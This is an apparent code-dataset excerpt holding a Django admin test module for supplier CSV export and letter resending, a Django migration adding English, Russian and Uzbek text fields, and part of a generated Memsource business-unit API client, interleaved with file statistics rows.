('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'False'),
('company__has_exported_before', 'True'),
('company__id', str(supplier.company.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '11234567'),
('company__number_of_case_studies', '0'),
# Two sectors were set above, hence the count of '2' and the
# comma-joined, quoted sectors value below.
('company__number_of_sectors', '2'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', '"TEST,FOO"'),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', 'gargoyle@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '1'),
('unsubscribed', 'False'),
])
# CSV responses use CRLF line endings; row 0 is the header, row 1 the
# single supplier's data row.
actual = str(response.content, 'utf-8').split('\r\n')
assert actual[0] == ','.join(expected_data.keys())
assert actual[1] == ','.join(expected_data.values())
def test_download_csv_company__sectors_is_empty(self):
# Same as test_download_csv, but the company has no sectors: the CSV
# should report a sector count of '0' and an empty sectors column.
company = Company.objects.create(
**COMPANY_DATA,
sectors=[]
)
supplier = Supplier.objects.create(company=company, **SUPPLIER_DATA)
data = {
'action': 'download_csv',
'_selected_action': Supplier.objects.all().values_list(
'pk', flat=True
)
}
response = self.client.post(
reverse('admin:supplier_supplier_changelist'),
data,
follow=True
)
# Expected CSV columns and values; identical to the populated-sectors
# case except for the sector-related fields.
expected_data = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'False'),
('company__has_exported_before', 'True'),
('company__id', str(supplier.company.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '11234567'),
('company__number_of_case_studies', '0'),
# Empty sectors list -> count '0' and blank sectors cell.
('company__number_of_sectors', '0'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', ''),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', 'gargoyle@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '1'),
('unsubscribed', 'False'),
])
# Compare field-by-field (split on ',') rather than whole-line, which
# is safe here because no value contains an embedded comma.
actual = str(response.content, 'utf-8').split('\r\n')
assert actual[0].split(',') == list(expected_data.keys())
assert actual[1].split(',') == list(expected_data.values())
def test_download_csv_multiple_suppliers(self):
company_data2 = COMPANY_DATA.copy()
company_data2['number'] = '01234568'
supplier_data2 = SUPPLIER_DATA.copy()
supplier_data2.update({
'sso_id': 2,
'company_email': '2@example.com',
})
company1 = Company.objects.create(**COMPANY_DATA)
company2 = Company.objects.create(**company_data2)
CompanyCaseStudy.objects.create(
title='foo',
description='bar',
company=company1
)
Supplier.objects.create(company=company1, **SUPPLIER_DATA)
Supplier.objects.create(company=company2, **supplier_data2)
supplier_one_expected = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'True'),
('company__has_exported_before', 'True'),
('company__id', str(company1.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '11234567'),
('company__number_of_case_studies', '1'),
('company__number_of_sectors', '0'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', ''),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', 'gargoyle@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '1'),
('unsubscribed', 'False'),
])
supplier_two_expected = OrderedDict([
('company__address_line_1', 'test_address_line_1'),
('company__address_line_2', 'test_address_line_2'),
('company__companies_house_company_status', ''),
('company__country', 'test_country'),
('company__created', '2012-01-14 12:00:00+00:00'),
('company__date_identity_check_message_sent', ''),
('company__date_of_creation', '2010-10-10'),
('company__date_published', ''),
('company__date_registration_letter_sent', ''),
('company__date_verification_letter_sent', ''),
('company__description', 'Company description'),
('company__email_address', ''),
('company__email_full_name', ''),
('company__employees', ''),
('company__expertise_countries', "['GB']"),
('company__expertise_industries', "['INS']"),
('company__expertise_languages', "['ENG']"),
('company__expertise_products_services', '{}'),
('company__expertise_regions', "['UKG3']"),
('company__export_destinations', "['DE']"),
('company__export_destinations_other', 'LY'),
('company__facebook_url', ''),
('company__has_case_study', 'False'),
('company__has_exported_before', 'True'),
('company__id', str(company2.pk)),
('company__is_exporting_goods', 'False'),
('company__is_exporting_services', 'False'),
('company__is_identity_check_message_sent', 'False'),
('company__is_published_find_a_supplier', 'False'),
('company__is_published_investment_support_directory', 'False'),
('company__is_registration_letter_sent', 'False'),
('company__is_showcase_company', 'False'),
('company__is_uk_isd_company', 'False'),
('company__is_verification_letter_sent', 'False'),
('company__keywords', ''),
('company__linkedin_url', ''),
('company__locality', 'test_locality'),
('company__logo', ''),
('company__mobile_number', '07505605132'),
('company__modified', '2012-01-14 12:00:00+00:00'),
('company__name', 'Test Company'),
('company__number', '01234568'),
('company__number_of_case_studies', '0'),
('company__number_of_sectors', '0'),
('company__po_box', ''),
('company__postal_code', 'test_postal_code'),
('company__postal_full_name', 'test_full_name'),
('company__sectors', ''),
('company__slug', 'test-company'),
('company__summary', ''),
('company__twitter_url', ''),
('company__verified_with_code', 'False'),
('company__verified_with_companies_house_oauth2', 'False'),
('company__verified_with_identity_check', 'False'),
('company__verified_with_preverified_enrolment', 'False'),
('company__website', 'http://example.com'),
('company_email', '2@example.com'),
('date_joined', '2017-03-21 13:12:00+00:00'),
('is_active', 'True'),
('mobile_number', ''),
('name', ''),
('role', 'EDITOR'),
('sso_id', '2'),
('unsubscribed', 'False'),
])
data = {
'action': 'download_csv',
'_selected_action': Supplier.objects.all().values_list(
'pk', flat=True
)
}
response = self.client.post(
reverse('admin:supplier_supplier_changelist'),
data,
follow=True
)
actual = str(response.content, 'utf-8').split('\r\n')
assert actual[0].split(',') == list(supplier_one_expected.keys())
assert actual[1].split(',') == list(supplier_two_expected.values())
assert actual[2].split(',') == list(supplier_one_expected.values())
@pytest.mark.django_db
class ResendLetterTestCase(TestCase):
    """Admin ``resend_letter`` action: resends verification letters to
    unverified suppliers and reports already-verified ones as skipped."""

    def setUp(self):
        superuser = User.objects.create_superuser(
            username='admin', email='admin@example.com', password='test'
        )
        self.client = Client()
        self.client.force_login(superuser)
        # Pin "now" so any letter-sent timestamps are deterministic.
        self.freezer = freeze_time("2012-01-14 12:00:00")
        self.freezer.start()

    def tearDown(self):
        self.freezer.stop()

    @patch('supplier.admin.messages')
    @patch('supplier.admin.send_verification_letter')
    def test_resend_letter(self, mocked_send_letter, mocked_messages):
        company = Company.objects.create(**COMPANY_DATA)
        supplier = Supplier.objects.create(company=company, **SUPPLIER_DATA)
        # already verified supplier — should be skipped by the action
        other_company_data = COMPANY_DATA.copy()
        other_supplier_data = SUPPLIER_DATA.copy()
        other_company_data['number'] = '12345678'
        other_company_data['verified_with_code'] = True
        other_supplier_data['sso_id'] = 2
        other_supplier_data['company_email'] = 'test@foo.com'
        other_company = Company.objects.create(**other_company_data)
        Supplier.objects.create(company=other_company, **other_supplier_data)
        data = {
            'action': 'resend_letter',
            '_selected_action': Supplier.objects.all().values_list(
                'pk', flat=True
            )
        }
        response = self.client.post(
            reverse('admin:supplier_supplier_changelist'),
            data,
            follow=True
        )
        # BUG FIX: the original wrote ``assert mock.called_once_with(...)``.
        # ``called_once_with`` is not a Mock assertion method — accessing it
        # auto-creates a child Mock, and calling that returns a truthy Mock,
        # so all three asserts passed unconditionally. Use the real
        # ``assert_called_once_with`` helpers so the calls are checked.
        # NOTE(review): if these now fail, the mocked call signatures differ
        # from what the original (vacuous) asserts assumed — fix the expected
        # arguments here rather than reverting to the truthy form.
        mocked_send_letter.assert_called_once_with(supplier.company)
        mocked_messages.success.assert_called_once_with(
            response.request,
            'Verification letter resent to 1 users'
        )
        mocked_messages.warning.assert_called_once_with(
            response.request,
            '1 users skipped'
        )
| 43.687783
| 77
| 0.57913
| 1,827
| 19,310
| 5.57526
| 0.11549
| 0.064795
| 0.043982
| 0.009425
| 0.855292
| 0.823483
| 0.810622
| 0.803554
| 0.784606
| 0.784606
| 0
| 0.030692
| 0.269394
| 19,310
| 441
| 78
| 43.786848
| 0.69131
| 0.001295
| 0
| 0.778325
| 0
| 0
| 0.43432
| 0.251724
| 0
| 0
| 0
| 0
| 0.024631
| 1
| 0.019704
| false
| 0.004926
| 0.029557
| 0
| 0.054187
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46291243d73dd2ad4814c83fab948371b54b9501
| 4,248
|
py
|
Python
|
EASTAR/main/migrations/0006_auto_20191004_2355.py
|
DightMerc/EASTAR
|
04a3578932f8b4b842e0898513ef279c2f750f48
|
[
"Apache-2.0"
] | 1
|
2020-09-21T16:46:19.000Z
|
2020-09-21T16:46:19.000Z
|
EASTAR/main/migrations/0006_auto_20191004_2355.py
|
DightMerc/EASTAR
|
04a3578932f8b4b842e0898513ef279c2f750f48
|
[
"Apache-2.0"
] | null | null | null |
EASTAR/main/migrations/0006_auto_20191004_2355.py
|
DightMerc/EASTAR
|
04a3578932f8b4b842e0898513ef279c2f750f48
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-10-04 18:55
from django.db import migrations, models
class Migration(migrations.Migration):
    """Split single-language ``title``/``text`` fields into per-language
    EN/RU/UZ fields on ContentText, Technologies and TechnologiesMoreText.

    NOTE(review): ``RemoveField('text')`` drops the existing text content —
    nothing copies the old data into the new per-language columns, and the
    new fields use ``default=None`` with ``preserve_default=False``, so
    applying this on a populated table will prompt for one-off defaults.
    Auto-generated migration: operation order matters; do not reorder.
    """
    dependencies = [
        ('main', '0005_auto_20191004_2349'),
    ]
    operations = [
        # Rename the existing title fields: English becomes explicit.
        migrations.RenameField(
            model_name='contenttext',
            old_name='title',
            new_name='titleEN',
        ),
        migrations.RenameField(
            model_name='technologies',
            old_name='title',
            new_name='titleEN',
        ),
        migrations.RenameField(
            model_name='technologiesmoretext',
            old_name='title',
            new_name='titleEN',
        ),
        # Drop the old single-language text fields (data is discarded).
        migrations.RemoveField(
            model_name='contenttext',
            name='text',
        ),
        migrations.RemoveField(
            model_name='technologies',
            name='text',
        ),
        migrations.RemoveField(
            model_name='technologiesmoretext',
            name='text',
        ),
        # Add per-language text/title fields for ContentText.
        migrations.AddField(
            model_name='contenttext',
            name='textEN',
            field=models.TextField(default=None, verbose_name='Текст EN'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='contenttext',
            name='textRU',
            field=models.TextField(default=None, verbose_name='Текст RU'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='contenttext',
            name='textUZ',
            field=models.TextField(default=None, verbose_name='Текст UZ'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='contenttext',
            name='titleRU',
            field=models.CharField(default=None, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='contenttext',
            name='titleUZ',
            field=models.CharField(default=None, max_length=255),
            preserve_default=False,
        ),
        # Add per-language text/title fields for Technologies.
        migrations.AddField(
            model_name='technologies',
            name='textEN',
            field=models.TextField(default=None, verbose_name='Описание EN'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologies',
            name='textRU',
            field=models.TextField(default=None, verbose_name='Описание RU'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologies',
            name='textUZ',
            field=models.TextField(default=None, verbose_name='Описание UZ'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologies',
            name='titleRU',
            field=models.CharField(default=None, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologies',
            name='titleUZ',
            field=models.CharField(default=None, max_length=255),
            preserve_default=False,
        ),
        # Add per-language text/title fields for TechnologiesMoreText.
        migrations.AddField(
            model_name='technologiesmoretext',
            name='textEN',
            field=models.TextField(default=None, verbose_name='Текст EN'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologiesmoretext',
            name='textRU',
            field=models.TextField(default=None, verbose_name='Текст RU'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologiesmoretext',
            name='textUZ',
            field=models.TextField(default=None, verbose_name='Текст UZ'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologiesmoretext',
            name='titleRU',
            field=models.CharField(default=None, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='technologiesmoretext',
            name='titleUZ',
            field=models.CharField(default=None, max_length=255),
            preserve_default=False,
        ),
    ]
| 32.427481
| 77
| 0.55532
| 362
| 4,248
| 6.350829
| 0.162983
| 0.08221
| 0.150065
| 0.176164
| 0.873423
| 0.873423
| 0.823836
| 0.808177
| 0.795128
| 0.606786
| 0
| 0.017394
| 0.336864
| 4,248
| 130
| 78
| 32.676923
| 0.798722
| 0.010593
| 0
| 0.919355
| 1
| 0
| 0.131635
| 0.005475
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008065
| 0
| 0.032258
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4691c3202861a42692fbaae090fd4f7fe6fcbd1d
| 20,486
|
py
|
Python
|
memsource_cli/api/business_unit_api.py
|
unofficial-memsource/memsource-cli-client
|
a6639506b74e95476da87f4375953448b76ea90c
|
[
"Apache-2.0"
] | 16
|
2019-09-25T00:20:38.000Z
|
2021-05-04T05:56:10.000Z
|
memsource_cli/api/business_unit_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 26
|
2019-09-30T14:00:03.000Z
|
2021-05-12T11:15:18.000Z
|
memsource_cli/api/business_unit_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 1
|
2021-05-24T16:19:14.000Z
|
2021-05-24T16:19:14.000Z
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:support@memsource.com>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class BusinessUnitApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen

    CRUD + list operations for Memsource business units under
    ``/api2/v1/businessUnits``. Each public method has a synchronous form
    and an ``async_req=True`` form, and delegates to a paired
    ``*_with_http_info`` method that builds and dispatches the request via
    ``self.api_client.call_api``.
    """
    def __init__(self, api_client=None):
        # Default to a freshly constructed ApiClient when none is injected.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
    def create_business_unit(self, **kwargs):  # noqa: E501
        """Create business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_business_unit(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param BusinessUnitEditDto body:
        :return: BusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_business_unit_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.create_business_unit_with_http_info(**kwargs)  # noqa: E501
            return data
    def create_business_unit_with_http_info(self, **kwargs):  # noqa: E501
        """Create business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_business_unit_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param BusinessUnitEditDto body:
        :return: BusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_business_unit" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/api2/v1/businessUnits', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='BusinessUnitDto',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def delete_business_unit(self, business_unit_id, **kwargs):  # noqa: E501
        """Delete business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_business_unit(business_unit_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int business_unit_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_business_unit_with_http_info(business_unit_id, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_business_unit_with_http_info(business_unit_id, **kwargs)  # noqa: E501
            return data
    def delete_business_unit_with_http_info(self, business_unit_id, **kwargs):  # noqa: E501
        """Delete business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_business_unit_with_http_info(business_unit_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int business_unit_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['business_unit_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_business_unit" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'business_unit_id' is set
        if ('business_unit_id' not in params or
                params['business_unit_id'] is None):
            raise ValueError("Missing the required parameter `business_unit_id` when calling `delete_business_unit`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'business_unit_id' in params:
            path_params['businessUnitId'] = params['business_unit_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/api2/v1/businessUnits/{businessUnitId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_business_unit(self, business_unit_id, **kwargs):  # noqa: E501
        """Get business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_business_unit(business_unit_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int business_unit_id: (required)
        :return: BusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_business_unit_with_http_info(business_unit_id, **kwargs)  # noqa: E501
        else:
            (data) = self.get_business_unit_with_http_info(business_unit_id, **kwargs)  # noqa: E501
            return data
    def get_business_unit_with_http_info(self, business_unit_id, **kwargs):  # noqa: E501
        """Get business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_business_unit_with_http_info(business_unit_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int business_unit_id: (required)
        :return: BusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['business_unit_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_business_unit" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'business_unit_id' is set
        if ('business_unit_id' not in params or
                params['business_unit_id'] is None):
            raise ValueError("Missing the required parameter `business_unit_id` when calling `get_business_unit`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'business_unit_id' in params:
            path_params['businessUnitId'] = params['business_unit_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/api2/v1/businessUnits/{businessUnitId}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='BusinessUnitDto',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def list_business_units(self, **kwargs):  # noqa: E501
        """List business units  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_business_units(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str name: Unique name of the business unit
        :param int page_number: Page number, starting with 0, default 0
        :param int page_size: Page size, accepts values between 1 and 50, default 50
        :return: PageDtoBusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.list_business_units_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.list_business_units_with_http_info(**kwargs)  # noqa: E501
            return data
    def list_business_units_with_http_info(self, **kwargs):  # noqa: E501
        """List business units  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_business_units_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str name: Unique name of the business unit
        :param int page_number: Page number, starting with 0, default 0
        :param int page_size: Page size, accepts values between 1 and 50, default 50
        :return: PageDtoBusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'page_number', 'page_size']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_business_units" % key
                )
            params[key] = val
        del params['kwargs']
        # Client-side range validation mirroring the API's documented limits.
        if 'page_number' in params and params['page_number'] < 0:  # noqa: E501
            raise ValueError("Invalid value for parameter `page_number` when calling `list_business_units`, must be a value greater than or equal to `0`")  # noqa: E501
        if 'page_size' in params and params['page_size'] > 50:  # noqa: E501
            raise ValueError("Invalid value for parameter `page_size` when calling `list_business_units`, must be a value less than or equal to `50`")  # noqa: E501
        if 'page_size' in params and params['page_size'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `page_size` when calling `list_business_units`, must be a value greater than or equal to `1`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        if 'name' in params:
            query_params.append(('name', params['name']))  # noqa: E501
        if 'page_number' in params:
            query_params.append(('pageNumber', params['page_number']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
